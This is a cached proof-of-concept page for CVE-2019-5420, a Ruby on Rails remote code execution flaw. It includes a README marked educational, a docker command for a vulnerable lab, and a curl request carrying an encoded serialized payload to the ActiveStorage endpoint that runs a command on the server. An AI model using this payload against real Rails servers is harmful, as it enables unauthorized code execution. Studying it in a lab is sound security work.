CVE-2019-5420 PoC — Ruby on Rails 安全特征问题漏洞

Source

https://github.com/knqyf263/CVE-2019-5420

Associated Vulnerability

Title:Ruby on Rails 安全特征问题漏洞 (CVE-2019-5420)
Description:Ruby on Rails是Rails团队的一套基于Ruby语言的开源Web应用框架。 Ruby on Rails中存在安全特征问题漏洞。远程攻击者可利用该漏洞在受影响的系统上执行任意代码。

Description

CVE-2019-5420 (Ruby on Rails)

Readme

# CVE-2019-5420
CVE-2019-5420 (Ruby on Rails)

For educational purposes only.  

See `Reference` for the details.

## Environment

- Ruby: 2.6.0p0
- Rails: 5.2.2


## Run

```
$ docker run --name cve-2019-5420 --rm -p 3000:3000 knqyf263/cve-2019-5420
```

## Exploit

Execute `touch /tmp/rce`

```
$ curl http://127.0.0.1:3000/rails/active_storage/disk/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHZPa0JCWTNScGRtVlRkWEJ3YjNKME9qcEVaWEJ5WldOaGRHbHZiam82UkdWd2NtVmpZWFJsWkVsdWMzUmhibU5sVm1GeWFXRmliR1ZRY205NGVRazZEa0JwYm5OMFlXNWpaVzg2Q0VWU1FnZzZDVUJ6Y21OSkloVmdkRzkxWTJnZ0wzUnRjQzl5WTJWZ0Jqb0dSVlE2RGtCbWFXeGxibUZ0WlVraUJqRUdPd2xVT2d4QWJHbHVaVzV2YVFZNkRFQnRaWFJvYjJRNkMzSmxjM1ZzZERvSlFIWmhja2tpREVCeVpYTjFiSFFHT3dsVU9oQkFaR1Z3Y21WallYUnZja2wxT2g5QlkzUnBkbVZUZFhCd2IzSjBPanBFWlhCeVpXTmhkR2x2YmdBR093bFUiLCJleHAiOm51bGwsInB1ciI6ImJsb2Jfa2V5In19--78c21ddf5ca4239d862118730069e04fbf38fd3d/test
```

Check that `/tmp/rce` was generated

```
$ docker exec -it cve-2019-5420 ls /tmp/rce
```


## Reference
https://hackerone.com/reports/473888

File Snapshot


 [4.0K]  /data/pocs/08bc44bf38e0c44961bca29351fe940e51ad7f8e
├── [ 548]  Dockerfile
├── [  52]  Gemfile
├── [   0]  Gemfile.lock
├── [1.0K]  LICENSE
└── [1023]  README.md

0 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!